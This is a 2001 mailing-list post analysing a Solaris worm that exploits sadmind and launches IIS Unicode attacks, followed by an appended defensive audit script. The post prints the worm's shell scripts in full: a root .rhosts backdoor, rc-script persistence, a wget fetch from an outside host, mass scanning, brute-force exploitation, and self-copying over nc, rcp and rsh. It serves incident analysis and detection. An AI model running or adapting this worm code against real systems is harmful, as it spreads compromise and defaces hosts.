Security Incidents mailing list archives

Re: httpd and sunrpc probes from 'sunos 5.6' machines


From: Martin Markgraf <mm () RIEN-AG DE>
Date: Tue, 8 May 2001 12:36:57 +0200

Hello,

Brad Doctor wrote:

I've also seen much of the same -- I submitted this to the list over the
weekend, but it apparently never made it there.

Basically, there is a worm process much like Lion, etc. that after compromising
the machine, starts generating IP addresses and going after more.  The exploit
that is being used is some sort of sadmin exploit.  A tell-tale sign is a
root shell open on port 600 (not functional however).  The exploit places its
contents in /dev/cuc and goes to town with a perl script and a random number
generator.  It also creates a wide-open .rhosts for root.  It also starts
an inetd process with /tmp/.x that has one service, the root shell bound to
it, just like the lion stuff did ala "sh -i", however this shell has no IO
capabilities on Solaris, and is thus useless.  So, much like the other worms,
this one trudges on blindly after cracking a machine that was wide-open to
begin with.  I think the same group wrote this one as well due to its
similarities in execution and methodology.  It is executing Unicode attacks,
with static HTML in the perl script, typical anti US stuff.

In the last five days or so I have seen about 9 scans for port 111 on a single
machine. Scanning back these hosts has shown that 8 of them are
running under solaris 5.6 and have an open port 600. The root shell on the
machines I have seen was functional if you connect to them with a program
like netcat instead of telnet, since a simple "sh -i" does not set up an
appropriate environment.
The worm itself first uses port 600 to create a "+ +" .rhosts file in
the root home directory of a newly hacked box and then copies itself via
rcp as /tmp/uni.tar to that box.

Here is the file list of the /tmp/uni.tar that I found:

drwxr-xr-x 0/1               0 Apr 29 12:55 2001 /dev/cuc/
-rwxr-xr-x 0/1            6556 Apr 26 08:07 2001 /dev/cuc/brute
-rw-r--r-- 0/1              86 Apr 26 09:13 2001 /dev/cuc/cmd1.txt
-rw-r--r-- 0/1             655 Apr 29 12:17 2001 /dev/cuc/cmd2.txt
-rwxr-xr-x 0/1           11828 Apr 25 15:27 2001 /dev/cuc/grabbb
-rw-r--r-- 0/1             151 Apr 26 09:13 2001 /dev/cuc/ranip.pl
-rwxr-xr-x 0/1            1591 Apr 27 06:38 2001 /dev/cuc/sadmin.sh
-rwxr-xr-x 0/1           14644 Apr 25 15:27 2001 /dev/cuc/sadmindex-sparc
-rwxr-xr-x 0/1             217 Apr 26 09:59 2001 /dev/cuc/start.sh
-rwxr-xr-x 0/1             566 Apr 27 03:45 2001 /dev/cuc/time.sh
-rw-r--r-- 0/1           67798 Apr 26 09:13 2001 /dev/cuc/uniattack.pl
-rwxr-xr-x 0/1             645 Apr 26 09:13 2001 /dev/cuc/uniattack.sh
-rwxr-xr-x 0/1           28620 Apr 26 08:30 2001 /dev/cuc/nc
-rw-r--r-- 0/1             413 Apr 26 11:16 2001 /dev/cuc/index.html
-rwxr-xr-x 0/1          136248 Apr 29 09:20 2001 /dev/cuc/wget

And these are the shell scripts:

cat cmd1.txt
------------
/bin/echo "+ +" > `/bin/grep root /etc/passwd|/bin/awk -F: '{print $6}'`/.rhosts
exit


cat cmd2.txt
------------
/bin/tar -xvf /tmp/uni.tar
/bin/echo "/bin/nohup /dev/cuc/start.sh >/dev/null 2>&1 &" > /etc/rc2.d/tmp1
/bin/cat /etc/rc2.d/S71rpc >> /etc/rc2.d/tmp1
/bin/mv /etc/rc2.d/S71rpc /etc/rc2.d/tmp2
/bin/mv /etc/rc2.d/tmp1 /etc/rc2.d/S71rpc
/bin/chmod 744 /etc/rc2.d/S71rpc
/dev/cuc/wget -c -O /tmp/perl-5.005_03-sol26-sparc-local.gz 
http://202.96.209.10:80/mirrors/www.sunfreeware.com/sparc/2.6/perl-5.005_03-sol26-sparc-local.gz
/dev/cuc/gzip -d /tmp/perl-5.005_03-sol26-sparc-local.gz
/bin/mkdir /usr/local
/bin/cat /dev/cuc/pkgadd.txt|/usr/sbin/pkgadd -d /tmp/perl-5.005_03-sol26-sparc-local
/bin/rm -f /tmp/uni.tar /tmp/perl-5.005_03-sol26-sparc-local
exit


cat start.sh
------------
#!/bin/sh
if [ ! -d /dev/cub ]; then
/bin/mkdir /dev/cub
fi
/bin/nohup /dev/cuc/time.sh &
i=1
while [ $i -lt 5 ]
do
/bin/nohup /dev/cuc/sadmin.sh &
/bin/nohup /dev/cuc/uniattack.sh &
i=`/bin/echo "$i+1"|/bin/bc`
done

cat time.sh
-----------
#!/bin/sh
/bin/ps -ef|/bin/grep uniattack.pl > /dev/cub/tmp1
while true
do
/bin/sleep 300
/bin/ps -ef|/bin/grep uniattack.pl > /dev/cub/tmp2
/bin/awk '{print $2}' /dev/cub/tmp1 > /dev/cub/tmp3
process=`/bin/awk '{print $2}' /dev/cub/tmp2`
for p in $process;do
/bin/grep $p /dev/cub/tmp3
if [ $? = 0 ];then
/bin/kill -9 $p
fi
done
/bin/cp /dev/cub/tmp2 /dev/cub/tmp1
i=`/bin/grep hacked /dev/cub/result.txt|/bin/wc -l`
if [ $i -gt 2000 ];then
/bin/nohup /bin/find / -name "index.html" -exec /bin/cp /dev/cuc/index.html {} \; &
/bin/rm -f /dev/cub/result.txt
fi
done

cat sadmin.sh
-------------
#!/bin/sh
while true
do
i=`/usr/local/bin/perl /dev/cuc/ranip.pl`
j=0
while [ $j -lt 256 ];do
/dev/cuc/grabbb -t 3 -a $i.$j.1 -b $i.$j.50 111 >> /dev/cub/$i.txt
/dev/cuc/grabbb -t 3 -a $i.$j.51 -b $i.$j.100 111 >> /dev/cub/$i.txt
/dev/cuc/grabbb -t 3 -a $i.$j.101 -b $i.$j.150 111 >> /dev/cub/$i.txt
/dev/cuc/grabbb -t 3 -a $i.$j.151 -b $i.$j.200 111 >> /dev/cub/$i.txt
/dev/cuc/grabbb -t 3 -a $i.$j.201 -b $i.$j.254 111 >> /dev/cub/$i.txt
j=`/bin/echo "$j+1"|/bin/bc`
done
iplist=`/bin/awk -F: '{print $1}' /dev/cub/$i.txt`
for ip in $iplist;do
/bin/rpcinfo -p $ip > /dev/cub/$i.rpc.txt
/bin/grep 100232 /dev/cub/$i.rpc.txt >/dev/null 2>&1
if [ $? = 0 ];then
/dev/cuc/brute 3 $ip >/dev/null 2>&1
if [ $? = 0 ];then
/bin/cat /dev/cuc/cmd1.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1
/bin/tar -cvf /tmp/uni.tar /dev/cuc
/bin/rcp /tmp/uni.tar root@$ip:/tmp/uni.tar >/dev/null 2>&1
if [ $? = 0 ];then
/bin/cat /dev/cuc/cmd2.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1
/bin/rsh -l root $ip /etc/rc2.d/S71rpc >/dev/null 2>&1 &
/bin/echo $ip >> /dev/cub/sadminhack.txt
/bin/rm -f /tmp/uni.tar
fi
else
/dev/cuc/brute 4 $ip >/dev/null 2>&1
if [ $? = 0 ];then
/bin/cat /dev/cuc/cmd1.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1
/bin/tar -cvf /tmp/uni.tar /dev/cuc
/bin/rcp /tmp/uni.tar root@$ip:/tmp/uni.tar >/dev/null 2>&1
if [ $? = 0 ];then
/bin/cat /dev/cuc/cmd2.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1
/bin/rsh -l root $ip /etc/rc2.d/S71rpc >/dev/null 2>&1 &
/bin/echo $ip >> /dev/cub/sadminhack.txt
/bin/rm -f /tmp/uni.tar
fi
fi
fi
fi
/bin/rm -f /dev/cub/$i.rpc.txt
done
/bin/rm -f /dev/cub/$i.txt
done

cat uniattack.sh
----------------
#!/bin/sh
while true
do
i=`/usr/local/bin/perl /dev/cuc/ranip.pl`
j=0
while [ $j -lt 256 ];do
/dev/cuc/grabbb -t 3 -a $i.$j.1 -b $i.$j.50 80 >> /dev/cub/$i.txt
/dev/cuc/grabbb -t 3 -a $i.$j.51 -b $i.$j.100 80 >> /dev/cub/$i.txt
/dev/cuc/grabbb -t 3 -a $i.$j.101 -b $i.$j.150 80 >> /dev/cub/$i.txt
/dev/cuc/grabbb -t 3 -a $i.$j.151 -b $i.$j.200 80 >> /dev/cub/$i.txt
/dev/cuc/grabbb -t 3 -a $i.$j.201 -b $i.$j.254 80 >> /dev/cub/$i.txt
j=`/bin/echo "$j+1"|/bin/bc`
done
iplist=`/bin/awk -F: '{print $1}' /dev/cub/$i.txt`
for ip in $iplist;do
/usr/local/bin/perl /dev/cuc/uniattack.pl $ip:80 >> /dev/cub/result.txt
done
rm -f /dev/cub/$i.txt


regards,
  Martin

--
Martin Markgraf
Rien Informationssysteme AG                         fon: +49 2841 9083061
Eurotec-Ring 15                                     fax: +49 2841 9083069
D-47445 Moers            http://www.rien-ag.de          mm () rien-ag de
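As an added example (not part of Martin's mail or of the worm toolkit), the following Bourne shell audit looks for the host artifacts the listing and scripts above describe: the /dev/cuc and /dev/cub directories, /tmp/uni.tar, the "+ +" .rhosts in root's home, the patched /etc/rc2.d/S71rpc, and process-list lines referencing the toolkit or the /tmp/.x inetd. The prefix argument, the build_sample_tree helper and the sample ps output are constructed for offline testing.

```shell
#!/bin/sh
# Host audit for the artifacts described in the mail (added example).
# PREFIX (first argument) is prepended to every path so the checks can run
# against a mounted image or a constructed test tree; use "" for the live host.

# Print one line per filesystem indicator found under the prefix.
fs_indicators() {
    prefix="${1%/}"
    # toolkit directory, scratch directory, propagation tarball, saved rc script
    for f in /dev/cuc /dev/cub /tmp/uni.tar /etc/rc2.d/tmp2; do
        if [ -e "$prefix$f" ]; then echo "present: $f"; fi
    done
    # cmd1.txt writes "+ +" into the .rhosts of root's home (taken from passwd)
    rhome=$(awk -F: '$1=="root"{print $6}' "$prefix/etc/passwd" 2>/dev/null)
    if [ -n "$rhome" ] && grep -q '^+ +' "$prefix$rhome/.rhosts" 2>/dev/null; then
        echo "rhosts: $rhome/.rhosts trusts every host and user"
    fi
    # cmd2.txt prepends the start.sh launcher to /etc/rc2.d/S71rpc
    if grep -q '/dev/cuc/start.sh' "$prefix/etc/rc2.d/S71rpc" 2>/dev/null; then
        echo "rc: /etc/rc2.d/S71rpc launches /dev/cuc/start.sh"
    fi
}

# Number of filesystem indicators, for scripting and assertions.
fs_indicator_count() { fs_indicators "$1" | wc -l | tr -d ' '; }

# Print lines of a saved "ps -ef" listing that reference the toolkit
# or an inetd started on the /tmp/.x configuration.
ps_indicators() {
    grep -E '/dev/cuc/|inetd .*/tmp/\.x' "$1" || true
}

# Constructed infected-looking tree for offline testing (not real data).
build_sample_tree() {
    t=$(mktemp -d)
    mkdir -p "$t/dev/cuc" "$t/etc/rc2.d" "$t/tmp" "$t/root"
    echo 'root:x:0:1:Super-User:/root:/sbin/sh' > "$t/etc/passwd"
    echo '+ +' > "$t/root/.rhosts"
    : > "$t/tmp/uni.tar"
    echo '/bin/nohup /dev/cuc/start.sh >/dev/null 2>&1 &' > "$t/etc/rc2.d/S71rpc"
    echo "$t"
}

# Live host usage: fs_indicators "" ; ps -ef > /tmp/ps.txt ; ps_indicators /tmp/ps.txt
```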